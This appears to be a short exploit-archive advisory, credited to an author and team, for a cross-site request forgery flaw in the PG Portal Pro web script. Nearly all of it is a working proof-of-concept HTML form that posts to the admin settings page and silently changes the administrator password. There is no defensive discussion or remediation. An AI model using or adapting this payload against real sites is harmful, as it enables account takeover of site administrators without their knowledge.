PG Portal Pro CSRF Vulnerability



###########################################################

[~] Exploit Title: PG Portal pro CSRF Vulnerability
[~] Author: Noxious
[~] Team: WE SECRET
[~] Gr33tz: Fox
[~] link:http://www.hotscripts.com/listing/pg-portal-pro/
###########################################################
 [CSRF Change Password]
 
 <form method="POST" action="http://server/admin/admin_settings.php" enctype="multipart/form-data">
 <input type="hidden" name="sel" value="save_admin_pass"><table cellpadding="3" cellspacing="0"><tr><td width="150"><font class="main_header_text">New Password:</font></td><td><input type="password" name="new_pass" value="" style="width: 200px;"></td></tr><tr><td>
 <font class="main_header_text">Confirm New Password:</font></td><td><input type="password" name="new_pass_confirm" value="" style="width: 200px;"></td></tr><tr><td> </td><td>
 <input type="submit" value="Save"></td></tr></table></form></div>